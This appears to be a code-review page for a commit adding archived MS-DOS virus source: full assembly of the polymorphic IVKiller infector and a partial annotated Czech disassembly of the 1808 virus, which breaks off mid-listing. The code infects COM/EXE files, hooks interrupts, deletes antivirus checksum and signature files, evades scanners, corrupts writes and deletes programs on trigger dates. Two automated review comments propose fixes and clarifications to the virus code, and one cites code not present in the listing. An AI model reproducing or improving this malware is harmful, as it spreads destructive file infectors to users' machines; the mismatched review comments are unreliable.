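Review bot: The single-record fallback after the `mov ah,3fh` read defeats the dual-record check the header describes: when fewer than 44h bytes come back, the first word is copied into `buf[42h]`, so any file shorter than one record whose first word happens to be `MZ`, `PK` or 60EAh (a tiny stub EXE, a truncated archive) is reported as a signature file — exactly the false-positive class the header says the second record was added to avoid. I would only synthesise the second record when exactly one record (42h bytes) was read, and clear `buf[42h]` first so a previous file's bytes left in the static buffer cannot satisfy the second `chk_iv`. A smaller point: `chk_iv` returns its verdict in ZF via its last `cmp`, which both callers rely on; a one-line comment such as `; returns ZF=1 if [di] holds an IV record marker` would save the next reader a trace.
```asm
        ; … unchanged: open, size check, seek to 0, read up to 44h bytes …
        int 21h
        cmp ax,44h              ; two full records read? check both as-is
        jz close
        mov word ptr buf[42h],0 ; never let a previous file's bytes pass as record two
        cmp ax,42h              ; exactly one record read?
        jnz close               ; shorter or odd-sized files are not signature files
        mov ax,word ptr buf     ; one record: mirror it so the second check sees it
        mov word ptr buf[42h],ax
close:
```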
@@ -0,0 +1,479 @@ + +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-Ä +; IVKiller - (c)1995 ûirogen - Using ûiCE v0.2á +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-Ä +; +; This is yet another virus in what I call my Feb '95 series. Anywayz, this +; virus's main point is that it candelete Invircible signature files. +; Something I haven't seen included with any other viruses. +; +; þ Polymorphic utilizing ViCE v0.2á. JMPS on, Anti-TBSCAN on. +; þ Infects COM and EXE when executed. +; þ COM Infection marker: fourth byte is 0 +; þ EXE infection marker: Checksum in header not equal to 0. +; þ Time/Date do not change +; þ Read-only and hidden files will be infected, and attributes restored. +; þ Virus installs its own critical error handler +; þ Deletes MSAV/CPAV CHecksum filez.. +; þ Deletes Invircible Signature files +; þ Activates on the second of any month, at which time it will phuck +; up all file writes using INT 21h/func 40h. +; + + +cseg segment + assume cs:cseg, ds:cseg, es:cseg, ss:cseg + +signal equ 0FA01h ; AX=signal/INT 21h/installation chk +vsafe_word equ 5945h ; magic word for VSAFE/VWATCH API +special equ 11h +act_day equ 3 +buf_size equ 170 +vice_size equ 1587+buf_size +virus_size equ (offset vend-offset start)+VICE_SIZE +extrn _vice:near + +org 0h +start: + + push ds es + inc si + mov ax,1000h ; looks like legit. INT call.. + add ax,signal-1000h ; are we memory resident? + mov dx,vsafe_word + mov bl,special + int 21h + call nx ; get relative offset + nx: pop bp + sub bp,offset nx + or si,si + jz no_install ; if carry then we are + + call crypt ; decrypt the next few bytez +c_start: + mov cs:activate[bp],0 + mov ah,2ah ; get date + int 21h + cmp dl,act_day ; + jnz no_act + mov cs:activate[bp],1 +no_act: + + mov ax,ds ; PSP segment + dec ax ; mcb below PSP m0n + mov ds,ax ; DS=MCB seg + cmp byte ptr ds: [0],'Z' ; Is this the last MCB in chain? 
+ jnz no_install + sub word ptr ds: [3],((virus_size+1023)/1024)*64*2 ; alloc MCB + sub word ptr ds: [12h],((virus_size+1023)/1024)*64*2 ; alloc PSP + mov es,word ptr ds: [12h] ; get high mem seg + push cs + pop ds + mov si,bp + mov cx,virus_size/2+1 + xor di,di + rep movsw ; copy code to new seg + xor ax,ax + mov ds,ax ; null ds + push ds + lds ax,ds: [21h*4] ; get 21h vector + mov es: word ptr old21+2,ds ; save S:O + mov es: word ptr old21,ax + pop ds + mov ds: [21h*4+2],es ; new int 21h seg + mov ds: [21h*4],offset new21 ; new offset + sub byte ptr ds: [413h],((virus_size+1023)*2)/1024;-totalmem +c_end: +no_install: + + pop es ds ; restore ES DS + cmp cs:is_exe[bp],1 + jz exe_return + + lea si,org_bytes[bp] ; com return + mov di,0100h ; -restore first 4 bytes + mov cx,2 + rep movsw + + mov ax,100h ; jump back to 100h + push ax +_ret:ret + + exe_return: + mov cx,ds ; calc. real CS + add cx,10h + add word ptr cs:[exe_jump+2+bp],cx + int 3 ; fix prefetch + db 0eah +exe_jump dd 0 +is_exe db 0 + +;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; Crypts portion of virus +; +crypt_res: + xor bp,bp +crypt: + lea si,c_start + add si,bp + mov cx,(offset c_end-offset c_start) + add byte ptr cs:xor_op[bp],10h ; self modifying code... + int 3 ; fix prefetch +l1: + db 2Eh +xor_op db 70h,34h ; tbscan won't flag this bitch +xor_val db 0 + inc si + loop l1 + sub byte ptr cs:xor_op[bp],10h ; unmodify code + ret + +;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; Infection routine - called from INT 21h handler. 
+; DS:DX=fname +; + +infect_file: + + int 3 + push dx + pop si + + push ds + xor ax,ax ; null ES + mov es,ax + lds ax,es:[24h*4] ; get INT 24h vector + mov cs:old_24_off,ax ; save it + mov cs:old_24_seg,ds + mov es:[24h*4+2],cs ; install our handler + mov es:[24h*4],offset new_24 + pop ds + push es ; we'll need it later + push cs + pop es + + mov ax,4300h ; get phile attribute + int 21h + mov ax,4301h ; null attribs + push ax cx ; save AX-call/CX-attrib + xor cx,cx + int 21h + + mov ax,3d02h ; open the file + int 21h + jc dont_do + + mov bx,ax ; get handle + + push cs + pop ds + + call kill_chklst ; kill MSAV and CPAV checksum files + call kill_iv ; kill Invircible Signature Files + + mov ah,3fh ; Read first bytes of file + mov cx,20h + lea dx,org_bytes + int 21h + + cmp byte ptr org_bytes,'M' ; single byte avoids heuristic flag + jz do_exe + cmp byte ptr org_bytes+3,0 + jz close + + mov is_exe,0 + + mov ax,5700h ; get time/date + int 21h + push cx dx + + call offset_end + push ax ; AX=end of file + + lea si,start ; DS:SI=start of code to encrypt + mov di,virus_size ; ES:DI=address for decryptor/ + push di ; encrypted code. (at heap) + mov cx,virus_size ; CX=virus size + mov dx,ax ; DX=EOF offset + add dx,100h ; DX=offset decryptor will run from + mov al,00001111b ; jmps,anti-tbscan, garbage, no CS: + call _vice ; call engine! + + pop dx + mov ah,40h + int 21h + + call offset_zero + pop ax ; restore COM file size + sub ax,3 ; calculate jmp offset + mov word ptr new_jmp+1,ax + + lea dx,new_jmp + mov cx,4 + mov ah,40h + int 21h + + pop dx cx ; pop date/time + mov ax,5701h ; restore the mother fuckers + int 21h + + close: + + pop cx ax ; restore attrib + int 21h + + call close_phile + + dont_do: + pop es ; ES=0 + lds ax,dword ptr old_24_off ; restore shitty DOS error handler + mov es:[24h*4],ax + mov es:[24h*4+2],ds + + ret + + do_exe: + + cmp word ptr exe_header[12h],0 ; is checksum (in hdr) 0? + jnz close + cmp byte ptr exe_header[18h],52h ; pklite'd? 
+ jz exe_ok + cmp byte ptr exe_header[18h],40h ; don't infect new format exe + jge close +exe_ok: + push bx + + mov ah,2ch ; grab a random number + int 21h + mov word ptr exe_header[12h],dx ; mark that it's us + mov is_exe,1 + + les ax,dword ptr exe_header+14h ; Save old entry point + mov word ptr ds:exe_jump, ax + mov word ptr ds:exe_jump+2, es + + push cs + pop es + + call offset_end + + push dx ax ; save file size DX:AX + + mov bx, word ptr exe_header+8h ; calc. new entry point + mov cl,4 ; *16 + shl bx,cl ; ^by shifting one byte + sub ax,bx ; get actual file size-header + sbb dx,0 + mov cx,10h ; divide AX/CX rDX + div cx + + mov word ptr exe_header+14h,dx + mov word ptr exe_header+16h,ax + mov rel_off,dx + + pop ax ; AX:DX file size + pop dx + pop bx + + mov cx,virus_size+10h ; calc. new size + adc ax,cx + + mov cl,9 ; calc new alloc (512) + push ax + shr ax,cl + ror dx,cl + stc + adc dx,ax + pop ax ; ax=size+virus + and ah,1 + + mov word ptr exe_header+4h,dx + mov word ptr exe_header+2h,ax + + lea si,start ; DS:SI=start of code to encrypt + mov di,virus_size ; ES:DI=address for decryptor and + push di ; encrypted code (at heap) + mov cx,virus_size ; CX=virus size + mov dx,rel_off ; DX=offset decryptor will run from + mov al,00001110b ; jmps,anti-tbscan,garbage, use CS: + call _vice ; call engine! + + pop dx + mov ah,40h + int 21h + + call offset_zero + + mov cx,18h ; write fiXed header + lea dx,exe_header + mov ah,40h + int 21h + + jmp close + +;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; set file ptr + +offset_zero: ; self explanitory + xor al,al + jmp set_fp +offset_end: + mov al,02h + set_fp: + mov ah,42h + xor cx,cx + xor dx,dx + int 21h + ret + +;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; close file +; +close_phile: + mov ah,3eh + int 21h + ret + +;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; Kill those darned MSAV and CPAV filez.. 
+; +kill_chklst: + mov di,2 ; counter for loop + lea dx,first_2die ; first fname to kill +kill_loop: + call delete_phile + lea dx,last_2die ; second fname to kill + dec di + jnz kill_loop + + ret +first_2die db 'CHKLIST.MS',0 ; MSAV shitty checksum +last_2die db 'CHKLIST.CPS',0 ; CPAV shitty checksum + +;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; Resets attribs then deletes phile -> DS:DX +; +delete_phile: + + mov ax,4301h ; reset attribs + xor cx,cx + int 21h + mov ah,41h + int 21h + ret +;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; Set DTA +; + set_dta: + mov ah,1ah + int 21h + ret + +;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; Kill Invircible Signature Files +; +kill_iv: + push bx + lea dx,ff_info + call set_dta + lea dx,filespec + xor cx,cx + mov ah,4eh + int 21h ; find first + jc done_with_iv +find_loop: + lea dx,ff_name + mov ax,3d00h ; open file + int 21h + jc not_iv ; if error opening then skip + xchg ax,bx ; get handle + mov ah,3fh ; read first word + mov cx,2 + lea dx,killiv_buf + int 21h + call close_phile + mov ax,word ptr killiv_buf + cmp ax,0FEA1h ; is iv? + jz yea_iv + cmp ax,0C307h ; is iv? + jz yea_iv + cmp ax,086BBh ; is iv? + jnz not_iv +yea_iv: + lea dx,ff_name + call delete_phile ; delete the phucker +not_iv: + mov ah,4fh ; find next + int 21h + jnc find_loop +done_with_iv: + pop bx + ret + +killiv_buf dw 0 +filespec db '*.*',0 +ff_info db 30 dup (0) +ff_name db 13 dup (0) + + +;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; new 21h + +new21: + + pushf + cmp ax,signal ; be it us? + jnz not_us ; richtig.. + cmp dx,vsafe_word + jnz not_us + cmp bl,special + jnz not_us + xor si,si + mov di,4559h + jmp jmp_org +not_us: + cmp cs:activate,0 ; time to activate? + jz nchk + cmp ah,40h ; write to phile? + jnz jmp_org + xor dx,dx ; phuck up address.. +nchk: cmp ax,4b00h ; execute phile? 
+ jnz jmp_org + + push ax bx cx di dx si ds es bp dx + mov ah,2ch ; grab random for cryptor + int 21h + mov byte ptr cs:xor_val,dl + pop dx + call crypt_res + call infect_file + call crypt_res + pop bp es ds si dx di cx bx ax + + jmp_org: + popf + db 0eah ; jump far XXXX:XXXX + old21 dd 0 + + +new_24: ; critical error handler + mov al,3 ; prompts suck, return fail + iret + + +activate db 0 +txt_ptr dw offset credits +credits db '[IvKiller, by ûirogen]' +credit_end: +new_jmp db 0E9h,0,0,0 ; jmp XXXX,0 +rel_off dw 0 +exe_header: +org_bytes db 0CDh,20h,0,0 ; original COM bytes | exe hdr +heap: +db 16h dup(0) ; remaining exe header space +old_24_off dw 0 ; old int24h vector +old_24_seg dw 0 +vend: +cseg ends + end start + diff --git a/MSDOS/Virus.MSDOS.Unknown.j_1808.asm b/MSDOS/Virus.MSDOS.Unknown.j_1808.asm new file mode 100644 index 00000000..38366950 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.j_1808.asm 
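Review bot: The header's trigger description does not match the code: it says the payload "Activates on the second of any month", but the check is `cmp dl,act_day` with `act_day equ 3`, and INT 21h/2Ah returns the day of the month (1–31) in DL, so as archived the `xor dx,dx` write-corruption path arms on the 3rd. For analysts relying on the header, correct it to `; Activates on the third of any month (act_day = 3)`, or at least annotate the constant, `act_day equ 3 ; day-of-month compared against DL from INT 21h/2Ah`. Worth stating in the header too that the file is not self-contained: `extrn _vice:near` and the two `call _vice` sites assume the ViCE v0.2 engine object, which this commit does not include, and `vice_size equ 1587+buf_size` bakes its size into `virus_size`.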
@@ -0,0 +1,583 @@
+;=======================================================================
+; VIRUS 1808
+; Virus se napojuje na preruseni 08 (hodiny) a zpomaluje chod pocitace.
+;
+;
+;
+45AD:0100 E99200 JMP 0195
+0100 E9 92 00 73 55 4D 73 44-6F 73 00 01 77 14 00 00 i..sUMsDos..w...
+0110 00 00 01 2C 02 70 00 1C-02 BC 0F EB 04 FE 0D C6 ...,.p...<.k.~.F
+0120 5D 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ]...............
+0130 00 F2 13 80 00 00 00 80-00 F2 13 5C 00 F2 13 6C .r.......r.\.r.l
+0140 00 F2 13 10 07 82 2A C5-00 82 2A 00 F0 06 00 4D .r....*E..*.p..M
+0150 5A 40 00 5D 01 00 00 20-00 2F 02 FF FF F3 2A 10 Z@.]... ./...s*.
+0160 07 84 19 C5 00 F3 2A 1E-00 00 00 00 00 00 00 00 ...E.s*.........
+0170 05 00 20 00 94 09 B0 B1-00 02 10 00 30 B1 02 00 .. ...01....01..
+
+45AD:0195 FC CLD
+45AD:0196 B4E0 MOV AH,E0 ;================================
+45AD:0198 CD21 INT 21 ; Test pritomnosti v pamati.
+45AD:019A 80FCE0 CMP AH,E0 ;
+45AD:019D 7316 JNB 01B5
+45AD:019F 80FC03 CMP AH,03
+45AD:01A2 7211 JB 01B5
+45AD:01A4 B4DD MOV AH,DD
+45AD:01A6 BF0001 MOV DI,0100
+45AD:01A9 BE1007 MOV SI,0710
+45AD:01AC 03F7 ADD SI,DI
+45AD:01AE 2E8B8D1100 MOV CX,CS:[DI+0011]
+45AD:01B3 CD21 INT 21
+45AD:01B5 8CC8 MOV AX,CS
+45AD:01B7 051000 ADD AX,0010
+45AD:01BA 8ED0 MOV SS,AX
+45AD:01BC BC0007 MOV SP,0700
+45AD:01BF 50 PUSH AX
+45AD:01C0 B8C500 MOV AX,00C5
+45AD:01C3 50 PUSH AX
+45AD:01C4 CB RETF ; Jdeme na nasledujici radek.
+;=========================================================================
+45BD:00C5 FC CLD ;
+45BD:00C6 06 PUSH ES
+45BD:00C7 2E8C063100 MOV CS:[0031],ES
+45BD:00CC 2E8C063900 MOV CS:[0039],ES
+45BD:00D1 2E8C063D00 MOV CS:[003D],ES
+45BD:00D6 2E8C064100 MOV CS:[0041],ES
+45BD:00DB 8CC0 MOV AX,ES
+45BD:00DD 051000 ADD AX,0010
+45BD:00E0 2E01064900 ADD CS:[0049],AX
+45BD:00E5 2E01064500 ADD CS:[0045],AX
+45BD:00EA B4E0 MOV AH,E0 ;=========================
+45BD:00EC CD21 INT 21 ;
+45BD:00EE 80FCE0 CMP AH,E0 ;
+45BD:00F1 7313 JNB 0106 ;=========================
+45BD:00F3 80FC03 CMP AH,03 ; VIRUS JE INSTALOVAN.
+45BD:00F6 07 POP ES
+45BD:00F7 2E8E164500 MOV SS,CS:[0045]
+45BD:00FC 2E8B264300 MOV SP,CS:[0043]
+45BD:0101 2EFF2E4700 JMP FAR CS:[0047]
+45BD:0106 33C0 XOR AX,AX ;=========================
+45BD:0108 8EC0 MOV ES,AX ; VIRUS NENI INSTALOVAN.
+45BD:010A 26A1FC03 MOV AX,ES:[03FC] ; Prerusovaci vektor 255.
+45BD:010E 2EA34B00 MOV CS:[004B],AX ; Je definovan kod
+45BD:0112 26A0FE03 MOV AL,ES:[03FE] ; 0000:03FC F3 REPZ
+45BD:0116 2EA24D00 MOV CS:[004D],AL 0000:03FD A5 MOVSW
+45BD:011A 26C706FC03F3A5 MOV Word Ptr ES:[03FC],A5F3 0000:03FE CB RETF
+45BD:0121 26C606FE03CB MOV Byte Ptr ES:[03FE],CB
+45BD:0127 58 POP AX
+45BD:0128 051000 ADD AX,0010
+45BD:012B 8EC0 MOV ES,AX
+45BD:012D 0E PUSH CS
+45BD:012E 1F POP DS
+45BD:012F B91007 MOV CX,0710
+45BD:0132 D1E9 SHR CX,1
+45BD:0134 33F6 XOR SI,SI
+45BD:0136 8BFE MOV DI,SI
+45BD:0138 06 PUSH ES
+45BD:0139 B84201 MOV AX,0142
+45BD:013C 50 PUSH AX
+45BD:013D EAFC030000 JMP 0000:03FC ;========================
+45BD:0142 8CC8 MOV AX,CS ; Po skoku pokracujeme
+45BD:0144 8ED0 MOV SS,AX ; na 45BD:142
+45BD:0146 BC0007 MOV SP,0700
+45BD:0149 33C0 XOR AX,AX ;========================
+45BD:014B 8ED8 MOV DS,AX ;
+45BD:014D 2EA14B00 MOV AX,CS:[004B] ; Obnoveni puvodni hodno-
+45BD:0151 A3FC03 MOV [03FC],AX ; ty preruseni 255.
+45BD:0154 2EA04D00 MOV AL,CS:[004D]
+45BD:0158 A2FE03 MOV [03FE],AL
+45BD:015B 8BDC MOV BX,SP ; Velikost programu v
+45BD:015D B104 MOV CL,04 ; paragrafech.
+45BD:015F D3EB SHR BX,CL
+45BD:0161 83C310 ADD BX,+10
+45BD:0164 2E891E3300 MOV CS:[0033],BX ; Zmen velikost alokovane
+45BD:0169 B44A MOV AH,4A ; pameti.
+45BD:016B 2E8E063100 MOV ES,CS:[0031] ;
+45BD:0170 CD21 INT 21 ;========================
+45BD:0172 B82135 MOV AX,3521 ; Cti preruseni 21H.
+45BD:0175 CD21 INT 21 ;
+45BD:0177 2E891E1700 MOV CS:[0017],BX ;
+45BD:017C 2E8C061900 MOV CS:[0019],ES ;========================
+45BD:0181 0E PUSH CS
+45BD:0182 1F POP DS
+45BD:0183 BA5B02 MOV DX,025B ; Definice noveho vektoru
+45BD:0186 B82125 MOV AX,2521 ; preruseni 21H.
+45BD:0189 CD21 INT 21 ;========================
+45BD:018B 8E063100 MOV ES,[0031]
+45BD:018F 268E062C00 MOV ES,ES:[002C]
+45BD:0194 33FF XOR DI,DI
+45BD:0196 B9FF7F MOV CX,7FFF
+45BD:0199 32C0 XOR AL,AL
+45BD:019B F2 REPNZ
+45BD:019C AE SCASB
+45BD:019D 263805 CMP ES:[DI],AL
+45BD:01A0 E0F9 LOOPNZ 019B
+45BD:01A2 8BD7 MOV DX,DI
+45BD:01A4 83C203 ADD DX,+03
+45BD:01A7 B8004B MOV AX,4B00
+45BD:01AA 06 PUSH ES
+45BD:01AB 1F POP DS
+45BD:01AC 0E PUSH CS
+45BD:01AD 07 POP ES
+45BD:01AE BB3500 MOV BX,0035
+45BD:01B1 1E PUSH DS
+45BD:01B2 06 PUSH ES
+45BD:01B3 50 PUSH AX
+45BD:01B4 53 PUSH BX
+45BD:01B5 51 PUSH CX
+45BD:01B6 52 PUSH DX
+45BD:01B7 B42A MOV AH,2A ; DATUM
+45BD:01B9 CD21 INT 21 ;======================
+45BD:01BB 2EC6060E0000 MOV Byte Ptr CS:[000E],00
+45BD:01C1 81F9C307 CMP CX,07C3 ; Virus se nemnozi roku
+45BD:01C5 7430 JZ 01F7 ; 1987, v patek 13 maze
+45BD:01C7 3C05 CMP AL,05 ; spustene soubory.
+45BD:01C9 750D JNZ 01D8
+45BD:01CB 80FA0D CMP DL,0D
+45BD:01CE 7508 JNZ 01D8
+45BD:01D0 2EFE060E00 INC Byte Ptr CS:[000E]
+45BD:01D5 EB20 JMP 01F7
+45BD:01D7 90 NOP
+45BD:01D8 B80835 MOV AX,3508 ;=======================
+45BD:01DB CD21 INT 21 ; Redefinice preruseni
+45BD:01DD 2E891E1300 MOV CS:[0013],BX ; 08.
+45BD:01E2 2E8C061500 MOV CS:[0015],ES
+45BD:01E7 0E PUSH CS
+45BD:01E8 1F POP DS
+45BD:01E9 C7061F00907E MOV Word Ptr [001F],7E90
+45BD:01EF B80825 MOV AX,2508
+45BD:01F2 BA1E02 MOV DX,021E ;
+45BD:01F5 CD21 INT 21 ;=======================
+45BD:01F7 5A POP DX
+45BD:01F8 59 POP CX
+45BD:01F9 5B POP BX
+45BD:01FA 58 POP AX
+45BD:01FB 07 POP ES
+45BD:01FC 1F POP DS
+45BD:01FD 9C PUSHF
+45BD:01FE 2EFF1E1700 CALL FAR CS:[0017] ; LOAD AND EXECUTE.
+45BD:0203 1E PUSH DS ;
+45BD:0204 07 POP ES
+45BD:0205 B449 MOV AH,49
+45BD:0207 CD21 INT 21
+45BD:0209 B44D MOV AH,4D
+45BD:020B CD21 INT 21
+45BD:020D B431 MOV AH,31
+45BD:020F BA0006 MOV DX,0600
+45BD:0212 B104 MOV CL,04
+45BD:0214 D3EA SHR DX,CL
+45BD:0216 83C210 ADD DX,+10
+45BD:0219 CD21 INT 21
+45BD:021B 32C0 XOR AL,AL
+45BD:021D CF IRET
+;
+;=======================================================================
+; OBSLUHA PRERUSENI 08.
+;
+45BD:021E 2E833E1F0002 CMP Word Ptr CS:[001F],+02
+45BD:0224 7517 JNZ 023D
+45BD:0226 50 PUSH AX
+45BD:0227 53 PUSH BX
+45BD:0228 51 PUSH CX
+45BD:0229 52 PUSH DX
+45BD:022A 55 PUSH BP
+45BD:022B B80206 MOV AX,0602
+45BD:022E B787 MOV BH,87
+45BD:0230 B90505 MOV CX,0505
+45BD:0233 BA1010 MOV DX,1010
+45BD:0236 CD10 INT 10
+45BD:0238 5D POP BP
+45BD:0239 5A POP DX
+45BD:023A 59 POP CX
+45BD:023B 5B POP BX
+45BD:023C 58 POP AX
+45BD:023D 2EFF0E1F00 DEC Word Ptr CS:[001F]
+45BD:0242 7512 JNZ 0256
+45BD:0244 2EC7061F000100 MOV Word Ptr CS:[001F],0001
+45BD:024B 50 PUSH AX
+45BD:024C 51 PUSH CX
+45BD:024D 56 PUSH SI
+45BD:024E B90140 MOV CX,4001
+45BD:0251 F3 REPZ
+45BD:0252 AC LODSB
+45BD:0253 5E POP SI
+45BD:0254 59 POP CX
+45BD:0255 58 POP AX
+45BD:0256 2EFF2E1300 JMP FAR CS:[0013]
+;
+;=======================================================================
+; OBSLUHA PRERUSENI 21H.
+;
+45BD:025B 9C PUSHF
+45BD:025C 80FCE0 CMP AH,E0
+45BD:025F 7505 JNZ 0266
+45BD:0261 B80003 MOV AX,0300 ; Test pritomnosti.
+45BD:0264 9D POPF ;
+45BD:0265 CF IRET ;==========================
+45BD:0266 80FCDD CMP AH,DD ;
+45BD:0269 7413 JZ 027E
+45BD:026B 80FCDE CMP AH,DE
+45BD:026E 7428 JZ 0298
+45BD:0270 3D004B CMP AX,4B00 ; LOAD AND EXECUTE.
+45BD:0273 7503 JNZ 0278
+45BD:0275 E9B400 JMP 032C
+45BD:0278 9D POPF
+45BD:0279 2EFF2E1700 JMP FAR CS:[0017] ; Puvodni obsluha.
+ ;==============================================
+45BD:027E 58 POP AX ; Obsluha kodu 0DDH.
+45BD:027F 58 POP AX
+45BD:0280 B80001 MOV AX,0100
+45BD:0283 2EA30A00 MOV CS:[000A],AX
+45BD:0287 58 POP AX
+45BD:0288 2EA30C00 MOV CS:[000C],AX
+45BD:028C F3 REPZ
+45BD:028D A4 MOVSB
+45BD:028E 9D POPF
+45BD:028F 2EA10F00 MOV AX,CS:[000F]
+45BD:0293 2EFF2E0A00 JMP FAR CS:[000A]
+ ;==============================================
+45BD:0298 83C406 ADD SP,+06 ; Obsluha kodu 0DEH.
+45BD:029B 9D POPF
+45BD:029C 8CC8 MOV AX,CS
+45BD:029E 8ED0 MOV SS,AX
+45BD:02A0 BC1007 MOV SP,0710
+45BD:02A3 06 PUSH ES
+45BD:02A4 06 PUSH ES
+45BD:02A5 33FF XOR DI,DI
+45BD:02A7 0E PUSH CS
+45BD:02A8 07 POP ES
+45BD:02A9 B91000 MOV CX,0010
+45BD:02AC 8BF3 MOV SI,BX
+45BD:02AE BF2100 MOV DI,0021
+45BD:02B1 F3 REPZ
+45BD:02B2 A4 MOVSB
+45BD:02B3 8CD8 MOV AX,DS
+45BD:02B5 8EC0 MOV ES,AX
+45BD:02B7 2EF7267A00 MUL Word Ptr CS:[007A]
+45BD:02BC 2E03062B00 ADD AX,CS:[002B]
+45BD:02C1 83D200 ADC DX,+00
+45BD:02C4 2EF7367A00 DIV Word Ptr CS:[007A]
+45BD:02C9 8ED8 MOV DS,AX
+45BD:02CB 8BF2 MOV SI,DX
+45BD:02CD 8BFA MOV DI,DX
+45BD:02CF 8CC5 MOV BP,ES
+45BD:02D1 2E8B1E2F00 MOV BX,CS:[002F]
+45BD:02D6 0BDB OR BX,BX
+45BD:02D8 7413 JZ 02ED
+45BD:02DA B90080 MOV CX,8000
+45BD:02DD F3 REPZ
+45BD:02DE A5 MOVSW
+45BD:02DF 050010 ADD AX,1000
+45BD:02E2 81C50010 ADD BP,1000
+45BD:02E6 8ED8 MOV DS,AX
+45BD:02E8 8EC5 MOV ES,BP
+45BD:02EA 4B DEC BX
+45BD:02EB 75ED JNZ 02DA
+45BD:02ED 2E8B0E2D00 MOV CX,CS:[002D]
+45BD:02F2 F3 REPZ
+45BD:02F3 A4 MOVSB
+45BD:02F4 58 POP AX
+45BD:02F5 50 PUSH AX
+45BD:02F6 051000 ADD AX,0010
+45BD:02F9 2E01062900 ADD CS:[0029],AX
+45BD:02FE 2E01062500 ADD CS:[0025],AX
+45BD:0303 2EA12100 MOV AX,CS:[0021]
+45BD:0307 1F POP DS
+45BD:0308 07 POP ES
+45BD:0309 2E8E162900 MOV SS,CS:[0029]
+45BD:030E 2E8B262700 MOV SP,CS:[0027]
+45BD:0313 2EFF2E2300 JMP FAR CS:[0023]
+ ;==============================================
+45BD:0318 33C9 XOR CX,CX ; Vymazani souboru.
+45BD:031A B80143 MOV AX,4301 ; Zmen atributy souboru.
+45BD:031D CD21 INT 21 ;
+45BD:031F B441 MOV AH,41 ; Vymaz
+45BD:0321 CD21 INT 21
+45BD:0323 B8004B MOV AX,4B00 ; a vykonej.
+45BD:0326 9D POPF
+45BD:0327 2EFF2E1700 JMP FAR CS:[0017] ; FUNGUJE v patek 13.
+ ;==============================================
+45BD:032C 2E803E0E0001 CMP Byte Ptr CS:[000E],01 ; LOAD & EXECUTE.
+45BD:0332 74E4 JZ 0318
+45BD:0334 2EC7067000FFFF MOV Word Ptr CS:[0070],FFFF
+45BD:033B 2EC7068F000000 MOV Word Ptr CS:[008F],0000
+45BD:0342 2E89168000 MOV CS:[0080],DX
+45BD:0347 2E8C1E8200 MOV CS:[0082],DS
+45BD:034C 50 PUSH AX
+45BD:034D 53 PUSH BX
+45BD:034E 51 PUSH CX
+45BD:034F 52 PUSH DX
+45BD:0350 56 PUSH SI
+45BD:0351 57 PUSH DI
+45BD:0352 1E PUSH DS
+45BD:0353 06 PUSH ES
+45BD:0354 FC CLD
+45BD:0355 8BFA MOV DI,DX
+45BD:0357 32D2 XOR DL,DL
+45BD:0359 807D013A CMP Byte Ptr [DI+01],3A
+45BD:035D 7505 JNZ 0364 ;
+45BD:035F 8A15 MOV DL,[DI] ; Volny prostor na disku.
+45BD:0361 80E21F AND DL,1F
+45BD:0364 B436 MOV AH,36
+45BD:0366 CD21 INT 21
+45BD:0368 3DFFFF CMP AX,FFFF
+45BD:036B 7503 JNZ 0370
+45BD:036D E97702 JMP 05E7 ;==========================
+45BD:0370 F7E3 MUL BX ; Vypocet volneho prostoru.
+45BD:0372 F7E1 MUL CX
+45BD:0374 0BD2 OR DX,DX
+45BD:0376 7505 JNZ 037D
+45BD:0378 3D1007 CMP AX,0710 ; Je dost mista na VIRUS?
+45BD:037B 72F0 JB 036D
+45BD:037D 2E8B168000 MOV DX,CS:[0080]
+45BD:0382 1E PUSH DS
+45BD:0383 07 POP ES
+45BD:0384 32C0 XOR AL,AL
+45BD:0386 B94100 MOV CX,0041
+45BD:0389 F2 REPNZ ; Hledani konce retezce.
+45BD:038A AE SCASB
+45BD:038B 2E8B368000 MOV SI,CS:[0080]
+45BD:0390 8A04 MOV AL,[SI]
+45BD:0392 0AC0 OR AL,AL
+45BD:0394 740E JZ 03A4
+45BD:0396 3C61 CMP AL,61
+45BD:0398 7207 JB 03A1
+45BD:039A 3C7A CMP AL,7A
+45BD:039C 7703 JA 03A1
